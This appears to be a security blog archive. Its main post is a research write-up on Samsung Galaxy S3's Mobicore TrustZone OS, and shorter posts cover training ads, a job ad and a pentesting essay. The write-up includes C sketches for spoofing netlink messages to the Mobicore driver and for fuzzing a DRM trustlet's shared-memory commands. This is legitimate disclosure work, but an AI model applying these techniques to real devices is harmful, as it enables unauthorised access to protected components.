
Thu, 6 Jun 2013

A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Introduction:


New types of mobile applications built on Trusted Execution Environments (TEEs), most notably ARM TrustZone micro-kernels, are emerging, and they require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and the TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low-privileged Android processes and Mobicore-enabled kernel drivers such as an IPSEC driver.


Mobicore OS:


The Samsung Galaxy S III was the first mobile phone to use the ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel, named Mobicore, is isolated from the handset's Android operating system at the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses the TrustZone security extension of ARM processors to create a secure program execution and data storage environment that sits next to the rich operating system (Android, Windows, iOS) of the mobile phone or tablet. The following figure published by G&D illustrates Mobicore's architecture:

Overview of Mobicore (courtesy of G&D)


A TrustZone-enabled processor provides hardware-level isolation of the above "Normal World" (NWd) and "Secure World" (SWd), meaning that the "Secure World" OS (Mobicore) and the programs running on top of it are immune to software attacks from the "Normal World" as well as a wide range of hardware attacks on the chip. This forms a Trusted Execution Environment (TEE) for security-critical applications such as digital wallets, electronic IDs and Digital Rights Management. The non-critical parts of those applications, such as the user interface, can run in the "Normal World" operating system, while the critical code, private encryption keys and sensitive I/O operations such as PIN code entry by the user are handled by the "Secure World". By doing so, the application and its sensitive data are protected against unauthorised access even if the "Normal World" operating system is fully compromised, because the attacker still cannot reach the critical part of the application running in the secure world.

Mobicore API:


The security-critical applications that run inside the Mobicore OS are referred to as trustlets and are developed by third parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets, as well as Android applications that communicate with the relevant trustlets via the Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). The Mobicore API for Android consists of the following three components:


1) Mobicore client library, located at /system/lib/libMcClient.so: the library used by Android OS or Dalvik applications to establish communication sessions with trustlets in the secure world.


2) Mobicore daemon, located at /system/bin/mcDriverDaemon: this service proxies Mobicore commands and responses between the NWd and SWd via the Mobicore device driver.


3) Mobicore device driver: registers the /dev/mobicore misc device and performs ARM Secure Monitor Calls (SMCs) to switch context from the NWd to the SWd.


The source code for the above components can be downloaded from Google Code. I enabled verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Note that you need to download the kernel source tree and stock ROM matching your S3 phone's kernel build number, which can be found under "Settings->About device". After compiling the new zImage, you need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217", which can unpack the zImage from the stock ROM, replace it with the newly compiled one and repack it.


By studying the source code of the user API library and observing debug messages from the kernel driver, I worked out the following data flow between the Android OS and Mobicore to establish a session and communicate with a trustlet (a minimal code sketch of this flow follows the list):


1) The Android application calls the mcOpenDevice() API, which causes the Mobicore daemon (/system/bin/mcDriverDaemon) to open a handle to the /dev/mobicore misc device.


2) It then allocates a "World Shared Memory" (WSM) buffer by calling mcMallocWsm(), which causes the Mobicore kernel driver to allocate a WSM buffer of the requested size and map it into the user-space application process. This shared memory buffer is later used by the Android application and the trustlet to exchange commands and responses.


3) mcOpenSession() is called with the UUID of the target trustlet (a 16-byte value, for instance ffffffff000000000000000000000003 for the PlayReady DRM trustlet) and the allocated WSM address to establish a session with the target trustlet through the shared memory.


4) Android applications can optionally attach additional memory buffers (up to six, with a maximum size of 1MB each) to the established session by calling the mcMap() API. In the case of the PlayReady DRM trustlet, which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving parameters and the other for receiving the trustlet's text output.


5) The application copies the command and parameter types into the WSM, and the parameter values into the second allocated buffer, and then calls the mcNotify() API to notify Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.


6) The mcWaitNotification() API is called with a timeout value and blocks until a response is received from the trustlet. If the response is not an error, the application can read the trustlet's returned data, output text and parameter values from the WSM and the two additional mapped buffers.


7) At the end of the session the application calls mcUnMap, mcFreeWsm and mcCloseSession.
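
Putting these steps together, the normal-world side of a session looks roughly like the sketch below. This is a minimal illustration only: the function names are the ones described above, but the exact signatures, constants and error handling are paraphrased from the open-source libMcClient code and may differ between versions, and the UUID, command buffer and sizes are placeholders.

#include <stdint.h>
#include <string.h>
#include "MobiCoreDriverApi.h"      /* header from the open-source Mobicore client library */

#define WSM_LEN 4096                /* illustrative WSM size */

int talk_to_trustlet(const mcUuid_t *uuid, const uint8_t *cmd, uint32_t cmdLen)
{
    mcSessionHandle_t session;
    uint8_t *wsm = NULL;

    memset(&session, 0, sizeof(session));
    session.deviceId = MC_DEVICE_ID_DEFAULT;

    /* 1) open /dev/mobicore via the Mobicore daemon */
    if (mcOpenDevice(MC_DEVICE_ID_DEFAULT) != MC_DRV_OK)
        return -1;

    /* 2) allocate the World Shared Memory buffer */
    if (mcMallocWsm(MC_DEVICE_ID_DEFAULT, 0, WSM_LEN, &wsm, 0) != MC_DRV_OK)
        goto out_dev;

    /* 3) open a session to the trustlet identified by its UUID */
    if (mcOpenSession(&session, uuid, wsm, WSM_LEN) != MC_DRV_OK)
        goto out_wsm;

    /* 4) optionally mcMap() additional buffers here (omitted in this sketch) */

    /* 5) place the command in the WSM and notify the secure world */
    if (cmdLen > WSM_LEN)
        cmdLen = WSM_LEN;
    memcpy(wsm, cmd, cmdLen);
    mcNotify(&session);

    /* 6) block until the trustlet answers; the response is then in wsm[] */
    if (mcWaitNotification(&session, 2000 /* ms */) != MC_DRV_OK) {
        /* timeout or error */
    }

    /* 7) tear the session down */
    mcCloseSession(&session);
out_wsm:
    mcFreeWsm(MC_DEVICE_ID_DEFAULT, wsm);
out_dev:
    mcCloseDevice(MC_DEVICE_ID_DEFAULT);
    return 0;
}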


The Mobicore kernel driver is the only component in the android operating system that interacts directly with Mobicore OS by use of ARM CPU's SMC instruction and Secure Interrupts . The interrupt number registered by Mobicore kernel driver in Samsung S3 phone is 47 that could be different for other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in android OS when it writes back data.
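
To give a flavour of that interaction, the fragment below shows the general shape of an SMC call on an ARMv7 kernel. It is a generic, illustrative sketch only: the actual Mobicore driver uses its own fastcall structure and register layout, which is defined in its source.

#include <stdint.h>

/* Generic ARMv7 secure monitor call (kernel context). Register assignments
   are illustrative; the real Mobicore driver passes its own fastcall
   structure to the secure world in a similar way. */
static inline uint32_t smc_call(uint32_t cmd, uint32_t arg1, uint32_t arg2)
{
    register uint32_t r0 asm("r0") = cmd;
    register uint32_t r1 asm("r1") = arg1;
    register uint32_t r2 asm("r2") = arg2;

    __asm__ volatile(
        ".arch_extension sec\n"   /* allow the smc instruction in the assembler */
        "smc #0\n"                /* trap into the secure monitor / Mobicore */
        : "+r"(r0)
        : "r"(r1), "r"(r2)
        : "memory");

    return r0;                    /* value returned by the secure world */
}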


Analysis of a Mobicore session:


The trustlets currently pre-loaded on the European S3 phones are listed below:


shell@android:/ # ls /data/app/mcRegistry


00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin


The 07010000000000000000000000000000.tlbin file is the "Content Management" trustlet, which is used by G&D to install and update other trustlets on target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin files are DRM-related trustlets developed by Discretix. I chose to analyze the PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it is used by the Samsung VideoHub application which is pre-loaded on the European S3 phones.


The VideoHub application does not communicate directly with the PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins including libdxdrmframeworkplugin.so, which depends on the libDxDrmServer.so library that makes the Mobicore API calls. Both of these libraries are closed source, so I had to perform dynamic analysis to monitor the communication between libDxDrmServer.so and the PlayReady trustlet. For this purpose, I could have installed API hooks in the Android DRM manager process (drmserver) and recorded the parameter values passed to the Mobicore user library (/system/lib/libMcClient.so) by setting the LD_PRELOAD environment variable in the init.rc script and flashing the phone with a new ROM. I found this approach unnecessary, as the source code for the Mobicore user library is available and I could add simple instrumentation code to it that saves API calls and the related World Shared Memory buffers to a log file.

In order to compile such a modified Mobicore library, you need to place it under the Android source code tree on a 64-bit machine (Android 4.1.1 requires a 64-bit machine to compile) with 30 GB of disk space. To save you this trouble, you can download a copy of my instrumented Mobicore user library from here. You need to create an empty log file at /data/local/tmp/log and replace the original library with the instrumented one (DO NOT FORGET TO BACK UP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and the PlayReady trustlet will be logged to /data/local/tmp/log. A sample of such a session log is shown below:



The contents and addresses of the World Shared Memory and the two additional mapped buffers are recorded in the above file. The command/response format in the WSM buffer is very similar to APDU communication in smart card applications, which is not a surprise, as G&D has a long history in smart card technology. The next step is to interpret the command/response data so that we can manipulate it later and observe the trustlet's behaviour. The trustlet's text output, together with inspection of the assembly code of libDxDrmServer.so, helped me figure out the PlayReady trustlet command and response format as follows:


client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000


client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b


trustlet response (wsm): 08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000


trustlet text output (mapped buffer 2):


==================================================


SRVXInvokeCommand command 1000000 hSession=320b4


SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25


SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074


SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48


SERVICE_DRM_BBX_SetKeyToOemContext type=5


SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48


SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4


DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset


calling DRM_Aes_CtrProcessData DxDecryptAsset


calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset


after calling DRM_HMAC_CreateMAC DxDecryptAsset


END SERVICE_DRM_BBX_SetKeyToOemContext


calling DRM_BBX_SetKeyToOemContext


SRVXInvokeCommand.id=0x1000000 res=0x0


==============================================


By mapping the information disclosed in the trustlet text output to the client command, the following format was derived (a C-structure view of this layout follows the breakdown):


08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208)


b4200300 : PlayReady session ID


00000001: Command ID (0x1000000)


00000000: Error code (0x0 = no error; set by the trustlet after mcWaitNotification)


25000000: Parameter type (0x25)


28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228)


30000000: Parameters length in bytes (0x30, encrypted key length)


05000000: encryption key type (0x5)
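
Viewed as a C structure, the WSM command header above looks roughly like this. The field names are my own and purely illustrative; the offsets and meanings follow the breakdown above, and all values are little-endian.

#include <stdint.h>

/* Illustrative layout of the PlayReady trustlet command header observed in
   the WSM buffer. Field names are invented for readability. */
struct prdy_wsm_cmd {
    uint32_t text_out_va;   /* SWd virtual address of the text output buffer (0x00200208) */
    uint32_t session_id;    /* PlayReady session ID (0x000320b4 in the captured session) */
    uint32_t command_id;    /* command ID (0x01000000) */
    uint32_t error_code;    /* 0x0 = no error; set by the trustlet after mcWaitNotification */
    uint32_t param_types;   /* parameter type (0x25) */
    uint32_t param_va;      /* SWd virtual address of the parameters buffer (0x00300228) */
    uint32_t param_len;     /* parameter length in bytes (0x30, encrypted key length) */
    uint32_t key_type;      /* encryption key type (0x5) */
};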


The trustlet receives client-supplied memory addresses as input data, which could be manipulated by an attacker; we'll test this attack later. The captured PlayReady session involved 18 command/response pairs, corresponding to the following high-level diagram of the PlayReady DRM algorithm published by G&D. I couldn't find a more detailed specification of PlayReady DRM on MSDN or other websites, but at this stage I was not interested in the implementation details of the PlayReady scheme: I didn't want to attack the DRM itself, but to find an exploitable issue such as a buffer overflow or memory disclosure in the trustlet.

DRM Trustlet diagram (courtesy of G&D)


Security Tests:


I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that could be exploited by an Android application to attack other applications or to execute code in the Android kernel space. I found one issue in the Mobicore kernel API, which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers a Linux netlink server with id=17, intended to be called from kernel space. However, a Linux user-space process can craft a spoofed message using netlink sockets and send it to the Mobicore kernel driver's netlink listener, which, as shown in the following figure, did not check the PID of the calling process; as a result, any Android app could call Mobicore kernel APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below.



An attacker would need to know the sequence number of an already established netlink connection between a kernel component such as IPSEC and the Mobicore driver in order to exploit this vulnerability. These sequence numbers are incremental, starting from zero, but since there is currently no kernel component on the Samsung phone that uses the Mobicore kernel API, this issue is not high risk. We notified the vendor about this issue six months ago but haven't received any response regarding a planned fix. The following figures demonstrate exploitation of this issue from an unprivileged Android process (a minimal code sketch of such a spoofed message follows the figures):

Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process


Unauthorised netlink message being processed by the Mobicore kernel driver
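
As a rough illustration of the primitive shown in the figures above (not the exact proof of concept), the sketch below has a low-privileged user-space process open a netlink socket to protocol id 17 and send a raw message to the kernel; the payload, length and sequence number are placeholders.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define NETLINK_MOBICORE 17            /* protocol id registered by the Mobicore kernel driver */

int main(void)
{
    /* Open a raw netlink socket to the in-kernel Mobicore listener. */
    int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_MOBICORE);
    if (sock < 0) { perror("socket"); return 1; }

    struct sockaddr_nl dst = { .nl_family = AF_NETLINK, .nl_pid = 0 /* kernel */ };

    /* Build a netlink header plus a placeholder payload. A real exploit has to
       match the sequence number of an established kernel-side session
       (they start at zero). */
    char buf[NLMSG_SPACE(64)];
    memset(buf, 0, sizeof(buf));
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_len = NLMSG_SPACE(64);
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_seq = 1;                /* spoofed sequence number */
    memcpy(NLMSG_DATA(nlh), "\x00\x00\x00\x00", 4);   /* placeholder command data */

    struct iovec iov = { .iov_base = nlh, .iov_len = nlh->nlmsg_len };
    struct msghdr msg = { .msg_name = &dst, .msg_namelen = sizeof(dst),
                          .msg_iov = &iov, .msg_iovlen = 1 };

    if (sendmsg(sock, &msg, 0) < 0) perror("sendmsg");
    close(sock);
    return 0;
}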


In the next phase of my tests I focused on fuzzing the PlayReady DRM trustlet mentioned in the previous section, by writing simple C programs linked with libMcClient.so and manipulating DWORD values such as the shared buffer virtual addresses. The following table summarises the results (a stripped-down fuzzer sketch follows the discussion of the results):
WSM offset 0 - memory address of the mapped output buffer in the trustlet process (original value = 0x08022000):
  values < 0x8022000: the fuzzer crashed
  values > 0x8022000: no errors

WSM offset 41 - memory address of the parameter mapped buffer in the trustlet process (original value = 0x28023000):
  0x00001000 < value < 0x28023000: the fuzzer crashed
  value >= 0x00001000: the trustlet exits with "parameter refers to secure memory area"
  value > 0x28023000: no errors

WSM offset 49 - parameter length (encryption key or certificate file length):
  for large values the trustlet exits with a "malloc() failed" message

The fuzzer crashes indicated that the Mobicore micro-kernel writes to normal-world memory addresses beyond the shared memory buffer. This is not a critical security issue, because it means the fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that some input validation is implemented in the Mobicore OS or the DRM trustlet that prevents normal-world access to mapped addresses other than the shared buffers. I haven't yet fuzzed the parameter values themselves, for example by manipulating the PlayReady XML data elements sent from the client to the trustlet, and there might be vulnerabilities in the PlayReady implementation that smarter fuzzing could pick up.
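
For reference, a stripped-down version of the DWORD fuzzer described above might look like the following. It reuses the session-setup flow sketched earlier in this post; the offsets are the ones from the table, while the helper name, timeout and error handling are illustrative.

#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include "MobiCoreDriverApi.h"   /* open-source libMcClient header */

/* Offsets in the WSM command (see the table above) that carry attacker-
   influenced DWORDs: output buffer address, parameter buffer address and
   parameter length. */
static const size_t fuzz_offsets[] = { 0, 41, 49 };

/* Overwrite one DWORD in an already prepared WSM command and dispatch it.
   'session' and 'wsm' are assumed to come from the session-setup sketch
   shown earlier. */
static void fuzz_dword(mcSessionHandle_t *session, uint8_t *wsm,
                       size_t offset, uint32_t value)
{
    memcpy(wsm + offset, &value, sizeof(value));   /* little-endian mutation */
    mcNotify(session);                             /* hand the command to the trustlet */
    if (mcWaitNotification(session, 2000 /* ms */) != MC_DRV_OK) {
        /* timeout or error: log the offset/value pair that upset the trustlet */
    }
}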


Conclusion:


We demonstrated that intercepting and manipulating the World Shared Memory (WSM) data can be used to gain better knowledge of the internal workings of Mobicore trustlets. We believe this method can be combined with side-channel measurements to perform black-box security assessments of mobile TEE applications. The context switching and memory sharing between the normal and secure worlds could be subject to side-channel attacks in specific cases, and we are focusing our future research on this area.

Mon, 20 May 2013

Your first mobile assessment

Monday morning, raring for a week of pwnage, and you see you've just been handed a new assessment, awesome. The problem? It's a mobile assessment and you've never done one before. What do you do, approach your team leader and ask for another assessment? He's going to tell you to learn how to do a mobile assessment and to do it quickly; there are plenty more to come.


Now you set out on your journey into mobile assessments and you get lucky: the application that needs to be assessed is an Android app. A few Google searches later and you are feeling pretty confident about this; Android assessments are meant to be easy, and there are even a few tools out there that "do it all". You download the latest and greatest version, run it and the app gets a clean bill of health. After all, the tool says so: there is no attack surface, no exposed intents, and the permissions all check out. You compile your report, hand it off to the client and a week later the client gets owned through the application... Apparently the backend servers were accepting application input without performing any authentication checks. Furthermore, all user input was trusted and no server-side validation was being performed. What went wrong? How did you miss these basic mistakes? After all, you followed all the steps, you ran the best tools and you ticked all the boxes. Unfortunately this approach is wrong: mobile assessments are not always simply about running a tool; much of the time they require the same steps used to test web applications, just applied in a different manner. This is where SensePost's Hacking by Numbers: Mobile course comes to the fore; it aims to introduce you to mobile assessments from the ground up.


The course offers hands-on training, introducing techniques for assessing applications on Android, iOS, RIM and Windows 8. Some of the areas covered include:



  • Communication protocols

  • Programming languages for mobile development

  • Building your own mobile penetration testing lab

  • Mobile application analysis

  • Static Analysis

  • Authentication and authorization

  • Data validation

  • Session management

  • Transport layer security and information disclosure



Unlike other mobile training or tutorials that focus on a specific platform or a specific tool on that platform, Hacking by Numbers aims to give you the knowledge to perform assessments on any platform with a well-established methodology. Building on everything taught in the Hacking by Numbers series, the mobile course aims to move assessments into the mobile sphere, continuing the strong tradition of pwnage. The labs are a direct result of the assessments we've done for clients. Our trainers do this on a weekly basis, so you get the knowledge gained from assessing numerous apps over the last few years.


On your next mobile assessment you'll be able to do both static and dynamic analysis of mobile applications. You will know where to find those credit card numbers stored on the phone and how to intercept traffic between the application and the backend servers.


The course: Hacking by Numbers: Mobile

Mon, 4 Mar 2013

Black Hat Europe - Bootcamp Training

Bootcamp
SensePost will be at Black Hat Europe 2013 to deliver the Bootcamp module of the Hacking by Numbers series. This method-based introductory course emphasizes the structure, approach and thought processes involved in hacking (over tools and tricks). The course is popular with beginners, who gain their first view into the world of hacking, as well as experts, who appreciate the sound, structured approach.


A breakdown of what will be covered during this course:


  • Internet Reconnaissance

  • Internet Fingerprinting

  • Vulnerability Discovery

  • Exploiting Known Vulnerabilities

  • Finding and Exploiting Vulnerabilities in Web Applications

  • Attacking Content Management Systems

  • SQL Injection

  • Real-world exercises and capture-the-flags


To summarize:


What? SensePost Hacking by Numbers, Bootcamp edition
Where? Amsterdam, BlackHat EU
When? 12th & 13th March 2013
Level? Introductory


See the BlackHat course page for more information, or to book your seat.


We're looking forward to seeing you there!
Glenn & Sara

Vulnerability Management Analyst Position


Have a keen interest in scanning over 12,000 IPs a week for vulnerabilities? Excited at the thought of assessing over 100 web applications for common vulnerabilities? If so, an exciting, as well as demanding, position has become available within the Managed Vulnerability Scanning (MVS) team at SensePost.


Job Title: Vulnerability Management Analyst


Salary Range: Industry standard, commensurate with experience


Location: Johannesburg/Pretoria, South Africa


We are looking for a talented person to join our MVS team to help manage the technology that makes up our BroadView suite and, more importantly, to find vulnerabilities, interpret the results and manually verify them. We are after talented people with a broad skill set to join our growing team of consultants. Our BroadView suite of products consists of our extensive vulnerability scanning engine, which looks at both the network layer and the application layer, as well as our extensive DNS footprinting technologies.


The Vulnerability Management Analyst will possess the following skills:


  • Be able to multitask and meet client deadlines. We want a person that thinks 'I can do that!'

  • Possess excellent written and oral communication skills. Being able to understand a vulnerability and explain it to business leaders is a must.

  • A working knowledge of enterprise vulnerability management products and remedial work flow

  • A broad knowledge of most common enterprise technologies and operating systems

  • A passion for security and technology


Some additional conditions:

  • A post graduate degree or infosec certification would be beneficial, however, showing us you have the passion and skills also helps

  • This job requires some after-hours and weekend commitments (we try to keep this to a minimum)

  • Bonus points for knowledge of sed, awk and python, ok even ruby.

  • PCI-QSA is desired but not required


Impress us with your skills by sending an email to jobs@sensepost.com and let's take it from there.


SensePost is an equal opportunity employer.

Wed, 9 May 2012

Pentesting in the spotlight - a view

As 44Con 2012 starts to gain momentum (we'll be there again this time around) I was perusing some of the talks from last year's event...

It was a great event with some great presentations, including (if I may say) our own Ian deVilliers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with Penetration Testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know, a core part of SensePost's business, and my career for almost 13 years, has been security testing, so I followed this talk quite closely. The talk raises some interesting ideas and I felt I'd like to comment on some of the points he was making.

As I understood it, the talk's hypothesis could be (over) simplified as follows:

  1. Despite all efforts the security problem is growing and we're heading towards a 'security apocalypse';
  2. Penetration Testing has been presented as a solution to this problem;
  3. Penetration Testing doesn't seem to be working - we're still just one 0-day away from being owned - even for our most valuable assets;
  4. One of the reasons for this is that we don't cater for the 0-day, which is a game-changer. 0-day is sometimes overemphasized, but mostly it's underemphasized, making the value of the test spurious at best;
  5. There are some ways in which this can be improved, including the use of '0-day cards', which allow the tester to emulate the use of a 0-day on a specific system without needing to actually have one. Think of this like a joker in a game of cards.
To begin with, let's consider the term "Penetration Testing", which sits at the core of the hypothesis. This term is widely used to express a number of security testing methodologies and could also be referred to as "attack & penetration", "ethical hacking", "vulnerability testing" or "vulnerability assessment". At SensePost we use the latter term, and the methodology it expresses includes a number of phases of which 'penetration testing' - the attempt to actually leverage the vulnerabilities discovered and practically demonstrate their potential impact to the business - is only one. The talk did not specify which definition of Penetration Test it was using. However, given the emphasis later in the talk on the significance of the 0-day and 'owning' things, I'm assuming he was using the most narrow, technical form of the term. It would seem to me that this already impacts much of his assertion: there are cases, of course, where a customer wants us simply to 'own' something or somethings, but most often Penetration Testing is performed within the context of some broader assessment in which many of Haroon's concerns may already be addressed. As the talk pointed out, there are instances where the question asked is "can we be breached?" or "can we be breached without detecting it?". In such cases a raw "attack and penetration" test can be exactly what's needed; indeed it's a model that's been used by the military for decades. However, for the most part penetration testing should only be used as a specific phase in an assessment and to achieve a specific purpose. I believe many services companies, including our own, have already evolved to the point where this is the case.

Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.

It is fair to say that the entire process within which security testing functions is not having the desired effect; hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.

A significant and interesting component of the talk's thesis has to do with the role of the "0-day" in security and testing. Haroon rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-day are inclined to over-emphasise those that they have, whilst those who don't tend to under-emphasise or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards: you can play a great game with a great hand, but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase of some of our own assessments.

What I struggle to understand, however, is why the talk emphasises this particular 'joker' over a number of others that seem apparent to me. For example, why not have a "malicious system administrator" card, a "spear phishing" card, a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like the Register and the Daily Telegraph illustrates, there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't invalidate penetration testing itself; it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.

The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.

The core of the approach I'm proposing is roughly based on the Microsoft methodology and looks as follows:

  1. Develop a model of your target environment, incorporating all players, locations, and interfaces. This is done in close collaboration between the client and the tester, thus incorporating both the 'insider' and the 'outsider' perspective;
  2. Enumerate all potential risks, and map them to the model. This results in a very long and comprehensive list of hypothetical risks, which would naturally include the 0-day, but also all the other 'jokers' that we discussed above;
  3. Sort the list into some order of priority and group similar hypothetical risks together;
  4. Perform tests in order of priority where appropriate to prove or disprove the hypothetical risks;
  5. Remediate, mitigate, insure or inform as appropriate;
  6. Rinse and repeat.
This approach provides a reasonable balance between solid theoretical risk management and aggressive technical testing that addresses all the concerns raised in the talk about the way penetration testing is done today. It also provides the customer with a concrete register of tested risks that can easily be updated from time-to-time and makes sense to both technical and business leaders.

Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.

Solving the security problem in total is sadly still going to take a whole lot more work...